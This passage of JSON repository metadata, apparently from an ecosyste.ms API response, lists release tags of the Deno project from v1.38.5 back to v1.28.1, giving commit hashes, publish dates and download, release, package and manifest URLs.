thub/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/a